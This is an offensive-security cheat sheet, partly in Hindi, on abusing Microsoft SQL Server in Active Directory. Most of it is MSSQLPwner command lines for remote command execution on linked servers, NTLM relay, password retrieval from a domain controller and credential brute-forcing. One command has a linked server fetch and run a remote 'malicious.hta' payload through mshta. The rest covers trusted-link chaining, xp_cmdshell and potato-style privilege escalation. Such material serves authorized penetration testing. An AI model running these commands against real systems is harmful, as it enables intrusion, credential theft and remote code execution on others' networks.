MSSQL AD Abuse
MSSQL AD Abuse
MSSQL Enumeration / Discovery
Python
MSSQLPwner उपकरण impacket पर आधारित है, और kerberos टिकट का उपयोग करके प्रमाणीकरण करने की अनुमति देता है, और लिंक श्रृंखलाओं के माध्यम से हमले करता है।
```shell # Interactive mode mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
Interactive mode with 2 depth level of impersonations
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive
Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname
Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250
Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250
Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
Executing direct query
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"
Retrieving password from the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password
Execute code using custom assembly on the linked server DC01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll
Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
Interactive mode
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
नेटवर्क से डोमेन सत्र के बिना एन्यूमरेटिंग
डोमेन के अंदर से एन्यूमरेटिंग
MSSQL बुनियादी दुरुपयोग
एक्सेस DB
MSSQL RCE
यह MSSQL होस्ट के अंदर कमांड्स को निष्पादित करना भी संभव हो सकता है।
Check in the page mentioned in the following section how to do this manually.
MSSQL Basic Hacking Tricks
1433 - Pentesting MSSQL - Microsoft SQL ServerMSSQL Trusted Links
यदि एक MSSQL उदाहरण को एक अलग MSSQL उदाहरण द्वारा विश्वसनीय (डेटाबेस लिंक) माना जाता है। यदि उपयोगकर्ता के पास विश्वसनीय डेटाबेस पर विशेषाधिकार हैं, तो वह अन्य उदाहरण में क्वेरी निष्पादित करने के लिए विश्वास संबंध का उपयोग करने में सक्षम होगा। ये विश्वास श्रृंखलाबद्ध किए जा सकते हैं और किसी बिंदु पर उपयोगकर्ता कुछ गलत कॉन्फ़िगर किए गए डेटाबेस को खोजने में सक्षम हो सकता है जहाँ वह कमांड निष्पादित कर सकता है।
डेटाबेस के बीच के लिंक वन ट्रस्ट के पार भी काम करते हैं।
Powershell Abuse
Metasploit
आप आसानी से metasploit का उपयोग करके विश्वसनीय लिंक की जांच कर सकते हैं।
ध्यान दें कि metasploit केवल MSSQL में openquery()
फ़ंक्शन का दुरुपयोग करने की कोशिश करेगा (तो, यदि आप openquery()
के साथ कमांड निष्पादित नहीं कर सकते हैं, तो आपको कमांड निष्पादित करने के लिए EXECUTE
विधि हाथ से आज़मानी होगी, नीचे और अधिक देखें।)
मैनुअल - Openquery()
Linux से आप sqsh और mssqlclient.py के साथ एक MSSQL कंसोल शेल प्राप्त कर सकते हैं।
Windows से आप लिंक भी ढूंढ सकते हैं और MSSQL क्लाइंट जैसे HeidiSQL का उपयोग करके कमांड को मैन्युअल रूप से निष्पादित कर सकते हैं।
Windows प्रमाणीकरण का उपयोग करके लॉगिन करें:
विश्वसनीय लिंक खोजें
भरोसेमंद लिंक में क्वेरी निष्पादित करें
लिंक के माध्यम से क्वेरी निष्पादित करें (उदाहरण: नए सुलभ उदाहरण में अधिक लिंक खोजें):
जांचें कि डबल और सिंगल कोट्स कहाँ उपयोग किए गए हैं, उन्हें इस तरह से उपयोग करना महत्वपूर्ण है।
आप इन विश्वसनीय लिंक श्रृंखलाओं को मैन्युअल रूप से हमेशा के लिए जारी रख सकते हैं।
यदि आप openquery()
से exec xp_cmdshell
जैसी क्रियाएँ नहीं कर सकते हैं, तो EXECUTE
विधि का प्रयास करें।
मैनुअल - EXECUTE
आप EXECUTE
का उपयोग करके विश्वसनीय लिंक का भी दुरुपयोग कर सकते हैं:
स्थानीय विशेषाधिकार वृद्धि
MSSQL स्थानीय उपयोगकर्ता के पास आमतौर पर एक विशेष प्रकार का विशेषाधिकार होता है जिसे SeImpersonatePrivilege
कहा जाता है। यह खाते को "प्रमाणीकरण के बाद एक ग्राहक का अनुकरण करने" की अनुमति देता है।
एक रणनीति जो कई लेखकों ने विकसित की है, वह है एक SYSTEM सेवा को एक धोखाधड़ी या मैन-इन-द-मिडल सेवा के लिए प्रमाणीकरण करने के लिए मजबूर करना जिसे हमलावर बनाता है। यह धोखाधड़ी सेवा तब SYSTEM सेवा का अनुकरण करने में सक्षम होती है जबकि यह प्रमाणीकरण करने की कोशिश कर रही होती है।
SweetPotato के पास इन विभिन्न तकनीकों का एक संग्रह है जिसे Beacon के execute-assembly
कमांड के माध्यम से निष्पादित किया जा सकता है।
Last updated